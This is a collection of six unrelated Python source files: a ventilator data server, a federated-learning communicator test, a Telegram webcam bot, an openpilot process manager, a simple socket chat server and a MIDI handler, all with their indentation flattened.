hevserver.py
|
#!/usr/bin/env python3
# data server to manage comms between UIs and LLI
#
# Author: Dónal Murray <donal.murray@cern.ch>
import asyncio
import json
import time
import threading
import argparse
import svpi
import hevfromtxt
import commsControl
from commsConstants import PAYLOAD_TYPE, CMD_TYPE, CMD_GENERAL, CMD_SET_TIMEOUT, CMD_SET_MODE, ALARM_CODES, CMD_MAP, CommandFormat
from collections import deque
from serial.tools import list_ports
from typing import List
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s')
class HEVPacketError(Exception):
pass
class HEVServer(object):
def __init__(self, lli):
self._alarms = []
self._values = None
self._dblock = threading.Lock() # make db threadsafe
self._lli = lli
self._lli.bind_to(self.polling)
self._broadcasting = True
self._datavalid = None # something has been received from arduino. placeholder for asyncio.Event()
self._dvlock = threading.Lock() # make datavalid threadsafe
self._dvlock.acquire() # come up locked to wait for loop
# start worker thread to send values in background
worker = threading.Thread(target=self.serve_all, daemon=True)
worker.start()
def __repr__(self):
with self._dblock:
return f"Alarms: {self._alarms}.\nSensor values: {self._values}"
def polling(self, payload):
# get values when we get a callback from commsControl (lli)
logging.debug(f"Payload received: {payload!r}")
# check if it is data or alarm
payload_type = payload.getType()
if payload_type == PAYLOAD_TYPE.ALARM:
# Alarm is latched until acknowledged in GUI
alarm_packet = payload.getDict()
alarmCode = alarm_packet["alarmCode"]
with self._dblock:
try:
alarm = ALARM_CODES(alarmCode).name
if alarm not in self._alarms:
self._alarms.append(alarm)
except ValueError as e:
# alarmCode does not exist in the enum, this is serious!
logging.error(e)
self._alarms.append("ARDUINO_FAIL") # assume Arduino is broken
# let broadcast thread know there is data to send
with self._dvlock:
self._datavalid.set()
elif payload_type == PAYLOAD_TYPE.DATA:
# pass data to db
with self._dblock:
self._values = payload.getDict()
# let broadcast thread know there is data to send
with self._dvlock:
self._datavalid.set()
elif payload_type == PAYLOAD_TYPE.CMD:
# ignore for the minute
pass
elif payload_type == PAYLOAD_TYPE.UNSET:
# ignore for the minute
pass
else:
# invalid packet, don't throw exception just log and pop
logging.error("Received invalid packet, ignoring")
# pop from lli queue
self._lli.pop_payloadrecv()
async def handle_request(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
# listen for queries on the request socket
data = await reader.read(300)
request = json.loads(data.decode("utf-8"))
# logging
addr = writer.get_extra_info("peername")
logging.info(f"Answering request from {addr}")
try:
reqtype = request["type"]
if reqtype == "cmd":
reqcmd = request["cmd"]
if reqcmd == "CMD_START" or reqcmd == "CMD_STOP":
# temporary, since CMD_START and CMD_STOP are now deprecated
reqcmdtype = "GENERAL" # fake a general command
logging.warning("CMD_START AND CMD_STOP are deprecated and will be removed in a future release.")
reqcmd = reqcmd.split("_")[1]
else:
reqcmdtype = request["cmdtype"]
reqparam = request["param"] if request["param"] is not None else 0
command = CommandFormat(cmdType=CMD_TYPE[reqcmdtype].value,
cmdCode=CMD_MAP[reqcmdtype].value[reqcmd].value,
param=reqparam)
self._lli.writePayload(command)
# processed and sent to controller, send ack to GUI since it's in enum
payload = {"type": "ack"}
elif reqtype == "broadcast":
# ignore for the minute
pass
elif reqtype == "alarm":
# acknowledgement of alarm from gui
try:
# delete alarm if it exists
with self._dblock:
self._alarms.remove(request["ack"])
payload = {"type": "ack"}
except NameError as e:
raise HEVPacketError(f"Alarm could not be removed. May have been removed already. {e}")
else:
raise HEVPacketError(f"Invalid request type")
packet = json.dumps(payload).encode()
# send reply and close connection
writer.write(packet)
await writer.drain()
writer.close()
except (NameError, KeyError, HEVPacketError) as e:
# invalid request: reject immediately
logging.warning(f"Invalid packet: {e}")
payload = {"type": "nack"}
packet = json.dumps(payload).encode()
writer.write(packet)
await writer.drain()
writer.close()
async def handle_broadcast(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
# log address
addr = writer.get_extra_info("peername")
logging.info(f"Broadcasting to {addr!r}")
while self._broadcasting:
# wait for data from serial port
try:
# set timeout such that there is never pileup
await asyncio.wait_for(self._datavalid.wait(), timeout=0.05)
except asyncio.TimeoutError:
continue
# take lock of db and prepare packet
with self._dblock:
values: List[float] = self._values
alarms = self._alarms if len(self._alarms) > 0 else None
broadcast_packet = {}
broadcast_packet["sensors"] = values
broadcast_packet["alarms"] = alarms # add alarms key/value pair
logging.debug(f"Send: {json.dumps(broadcast_packet,indent=4)}")
try:
writer.write(json.dumps(broadcast_packet).encode())
await writer.drain()
except (ConnectionResetError, BrokenPipeError):
# Connection lost, stop trying to broadcast and free up socket
logging.warning(f"Connection lost with {addr!r}")
self._broadcasting = False
# take control of datavalid and reset it
with self._dvlock:
self._datavalid.clear()
self._broadcasting = True
writer.close()
async def serve_request(self, ip: str, port: int) -> None:
server = await asyncio.start_server(
self.handle_request, ip, port)
# get address for log
addr = server.sockets[0].getsockname()
logging.info(f"Listening for requests on {addr}")
async with server:
await server.serve_forever()
async def serve_broadcast(self, ip: str, port: int) -> None:
server = await asyncio.start_server(
self.handle_broadcast, ip, port)
# get address for log
addr = server.sockets[0].getsockname()
logging.info(f"Serving on {addr}")
async with server:
await server.serve_forever()
async def create_sockets(self) -> None:
self._datavalid = asyncio.Event() # initially false
self._dvlock.release()
LOCALHOST = "127.0.0.1"
b1 = self.serve_broadcast(LOCALHOST, 54320) # WebUI broadcast
r1 = self.serve_request(LOCALHOST, 54321) # joint request socket
b2 = self.serve_broadcast(LOCALHOST, 54322) # NativeUI broadcast
tasks = [b1, r1, b2]
#tasks = [b1, r1]
await asyncio.gather(*tasks, return_exceptions=True)
def serve_all(self) -> None:
asyncio.run(self.create_sockets())
if __name__ == "__main__":
#parser to allow us to pass arguments to hevserver
parser = argparse.ArgumentParser(description='Arguments to run hevserver')
parser.add_argument('--inputFile', type=str, default = '', help='a test file to load data')
args = parser.parse_args()
# check if input file was specified
if args.inputFile != '':
if args.inputFile[-1-3:] == '.txt':
# assume sample.txt format
lli = hevfromtxt.hevfromtxt(args.inputFile)
else:
# assume hex dump
lli = svpi.svpi(args.inputFile)
logging.info(f"Serving data from {args.inputFile}")
else:
# get arduino serial port
for port in list_ports.comports():
vidpid = ""
if port.pid != None and port.vid != None:
vidpid = f"{ port.vid:04x}:{port.pid:04x}".upper()
logging.debug(vidpid)
if port.manufacturer and "ARDUINO" in port.manufacturer.upper():
port_device = port.device
elif vidpid == "10C4:EA60" :
port_device = port.device
# initialise low level interface
try:
lli = commsControl.commsControl(port=port_device)
logging.info(f"Serving data from device {port_device}")
except NameError:
logging.error("Arduino not connected")
exit(1)
hevsrv = HEVServer(lli)
# serve forever
loop = asyncio.get_event_loop()
try:
loop.run_forever()
finally:
loop.close()
|
test_communicator.py
|
# Copyright 2021 Fedlearn authors.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
import socket
import threading
from dataclasses import dataclass
root_path = os.getcwd()
sys.path.append(root_path)
sys.path.append(os.path.join(root_path,'demos/HFL'))
import sys
from demos.HFL.communicator.base_communicator import BaseCommunicator
from core.entity.common.machineinfo import MachineInfo
from demos.HFL.common.hfl_message import HFL_MSG
from demos.HFL.basic_control_msg_type import HFL_Control_Massage_Type as HCT
from demos.HFL.common.msg_handler import Msg_Handler
import time
from multiprocessing import Process
from demos.HFL.communicator.com_builder import (
Communicator_Builder,
CommType
)
import unittest # The test framework
Condition = threading.Condition()
@dataclass
class Config:
ip:str
port:str
mode:str
class TestCommunicator(unittest.TestCase):
def test_grpc_communicator(self):
class Receiver(Msg_Handler):
def __init__(self,comm:BaseCommunicator):
self.comm = comm
def handle_message(self,msg_type, msg_data:HFL_MSG):
msg_data.sender,msg_data.receiver = msg_data.receiver,msg_data.sender
self.comm.send_message(msg_data)
'''DO nothing'''
class Sender(Msg_Handler):
def __init__(self,comm:BaseCommunicator):
self.comm = comm
self.return_type = ''
def handle_message(self, msg_type, msg_data:HFL_MSG):
self.return_type = msg_data.get_type()
with Condition:
Condition.notify()
def get_return(self)->str:
with Condition:
Condition.wait()
return self.return_type
def send(self,msg_type_str):
sender_info = MachineInfo(ip=local_ip, port=sender_port,token='dummy1')
receiver_info = MachineInfo(ip=local_ip, port=receiver_port,token='dummy2')
msg_1 = HFL_MSG(
type=msg_type_str,
sender=sender_info,
receiver=receiver_info)
self.comm.send_message(msg_1)
return self.get_return()
local_ip = socket.gethostbyname(socket.gethostname())
sender_port = '9991'
receiver_port = '9909'
config_1 =Config(
ip=local_ip,
port=sender_port,
mode='proxy')
comm_1 = Communicator_Builder.make(
comm_type=CommType.GRPC_COMM,
config=config_1)
config_2 =Config(
ip=local_ip,
port=receiver_port,
mode='client')
comm_2 = Communicator_Builder.make(
comm_type= CommType.GRPC_COMM,
config = config_2)
sender = Sender(comm_1)
comm_1.add_msg_handler(sender)
receiver = Receiver(comm_2)
comm_2.add_msg_handler(receiver)
thread = threading.Thread(target=comm_2.run)
thread.start()
thread = threading.Thread(target=comm_1.run)
thread.start()
time.sleep(1)
send_msg_type_str = 'dummy'
ret_msg_type_str = sender.send(send_msg_type_str)
self.assertEqual(send_msg_type_str, ret_msg_type_str)
comm_1.stop()
comm_2.stop()
if __name__ == '__main__':
unittest.main()
|
bot2.py
|
#! /usr/bin/env python
# responde a comandos
import os
from telegram.ext import Updater, CommandHandler
import threading
from io import BytesIO
from PIL import Image
import cv2 as cv
from umucv.stream import Camera
from dotenv import load_dotenv
load_dotenv()
updater = Updater(os.environ['TOKEN'])
Bot = updater.bot
cam = Camera()
def shutdown():
updater.stop()
updater.is_idle = False
cam.stop()
def stop(update,_):
cid = update.message.chat_id
if cid != os.environ['USER_ID']:
return
update.message.reply_text('Bye!')
threading.Thread(target=shutdown).start()
def hello(update, _):
update.message.reply_text('Hello {}'.format(update.message.from_user.first_name))
def sendImage(userid, frame):
frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)
image = Image.fromarray(frame, mode = 'RGB')
byte_io = BytesIO()
image.save(byte_io, 'PNG')
byte_io.seek(0)
Bot.sendPhoto(chat_id=userid, photo=byte_io)
def image(update,_):
cid = update.message.chat.id
img = cam.frame
sendImage(cid, img)
updater.dispatcher.add_handler(CommandHandler('stop', stop))
updater.dispatcher.add_handler(CommandHandler('hello', hello))
updater.dispatcher.add_handler(CommandHandler('image', image))
updater.start_polling()
updater.idle()
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
from common.op_params import opParams
op_params = opParams()
traffic_lights = op_params.get('traffic_lights', False)
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
if not (os.system("python3 -m pip list | grep 'scipy' ") == 0):
os.system("cd /data/openpilot/installer/scipy_installer/ && ./scipy_installer")
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"trafficd": ("selfdrive/trafficd", ["./trafficd"]),
"traffic_manager": "selfdrive.trafficd.traffic_manager",
"thermalonlined": "selfdrive.thermalonlined",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"mapd": ("selfdrive/mapd", ["./mapd.py"]),
"driverview": "selfdrive.controls.lib.driverview",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
'deleter',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'mapd',
'thermalonlined',
'locationd',
'dmonitoringd',
]
if traffic_lights:
car_started_processes += [
'trafficd',
'traffic_manager',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
if proc[0] != 'selfdrive/mapd':
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
#for p in daemon_processes:
# start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = True
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = True # set to False for logging
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "1"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "1"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("DisablePowerDownTime", "30"),
("DistanceTraveled", "1"),
("DistanceTraveledEngaged", "1"),
("DistanceTraveledOverride", "1"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
raise
# manual exit because we are forked
sys.exit(0)
|
Server.py
|
import socket, threading
HOST = "127.0.0.1"
PORT = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen()
clients = []
nicknames = []
# broadcast func
def broadcast(message):
for client in clients:
client.send(message)
# handle func
def handle(client):
while True:
try:
message = client.recv(2048)
print(f"{nicknames[clients.index(client)]} says {message}")
broadcast(message)
except:
index = clients.index(client)
clients.remove(client)
nickname = nicknames[index]
nicknames.remove(nickname)
break
# receive func
def receive():
while True:
client,address = server.accept()
print(f"Connected with {str(address)}!")
client.send("NICKNAME".encode("utf-8"))
nickname = client.recv(2048).decode("utf-8")
nicknames.append(nickname)
clients.append(client)
print(f"Nickname of new client is {nickname}")
broadcast(f"{nickname} joined the chat!\n".encode("utf-8"))
client.send("You Have Connected to the server".encode("utf-8"))
thread = threading.Thread(target=handle,args=(client,))
thread.start()
print("******Server is running******")
receive()
|
midi.py
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
LJay/LJ
v0.7.0
Midi Handler
Deprecated, see midi3
by Sam Neurohack
from /team/laser
"""
print "importing midi 0"
import time
import rtmidi
from rtmidi.midiutil import open_midiinput
from threading import Thread
from rtmidi.midiconstants import (CHANNEL_PRESSURE, CONTROLLER_CHANGE, NOTE_ON, NOTE_OFF,
PITCH_BEND, POLY_PRESSURE, PROGRAM_CHANGE)
import mido
from mido import MidiFile
#import mido
import sys
from serial.tools import list_ports
import serial
from sys import platform
import gstt
# import bhoroscp
import bhoreal
import launchpad
from OSC import OSCServer, OSCClient, OSCMessage
#import orbits
midiname = ["Name"] * 16
midiport = [rtmidi.MidiOut() for i in range(16) ]
is_py2 = sys.version[0] == '2'
if is_py2:
from Queue import Queue
else:
from queue import Queue
# max 16 midi port array
midinputsname = ["Name"] * 16
midinputsqueue = [Queue() for i in range(16) ]
midinputs = []
BhorealMidiName = "Bhoreal"
LaunchMidiName = "Launch"
BhorealPort, Midi1Port, Midi2Port, VirtualPort, MPort = -1,-1,-1, -1, -1
VirtualName = "LaunchPad Mini"
Mser = False
# Myxolidian 3 notes chords list
Myxo = [(59,51,54),(49,52,56),(49,52,56),(51,54,57),(52,56,59),(52,56,59),(54,57,48),(57,49,52)]
MidInsNumber = 0
try:
input = raw_input
except NameError:
# Python 3
StandardError = Exception
STATUS_MAP = {
'noteon': NOTE_ON,
'noteoff': NOTE_OFF,
'programchange': PROGRAM_CHANGE,
'controllerchange': CONTROLLER_CHANGE,
'pitchbend': PITCH_BEND,
'polypressure': POLY_PRESSURE,
'channelpressure': CHANNEL_PRESSURE
}
# OSC destination list for incoming midi
midi2OSC = {
"lj": {"oscip": "127.0.0.1", "oscport": 8002, "notes": False, "msgs": False},
"nozoid": {"oscip": "127.0.0.1", "oscport": 8003, "notes": False, "msgs": False},
"dump": {"oscip": "127.0.0.1", "oscport": 8040, "notes": True, "msgs": True}
}
#mycontroller.midiport[LaunchHere].send_message([CONTROLLER_CHANGE, LaunchTop[number-1], color])
def send(device,msg):
'''
# if device is the midi name
if device in midiname:
deviceport = midiname.index(device)
midiport[deviceport].send_message(msg)
'''
if device == "Launchpad":
#print LaunchHere
midiport[gstt.LaunchHere].send_message(msg)
if device == "Bhoreal":
midiport[gstt.BhorealHere].send_message(msg)
def NoteOn(note, color):
global MidInsNumber
gstt.note = note
gstt.velocity = color
for port in range(MidInsNumber):
if midiname[port].find(LaunchMidiName) == 0:
launchpad.PadNoteOn(note%64,color)
if midiname[port].find(BhorealMidiName) == 0:
gstt.BhorLeds[note%64]=color
midiport[port].send_message([NOTE_ON, note%64, color])
#bhorosc.sendosc("/bhoreal", [note%64 , color])
if midiname[port].find(BhorealMidiName) != 0 and midiname[port].find(LaunchMidiName) != 0:
midiport[port].send_message([NOTE_ON, note, color])
#virtual.send_message([NOTE_ON, note, color])
for OSCtarget in midi2OSC:
if midi2OSC[OSCtarget]['notes']:
pass
#OSCsend(OSCtarget, "/noteon", [note, color])
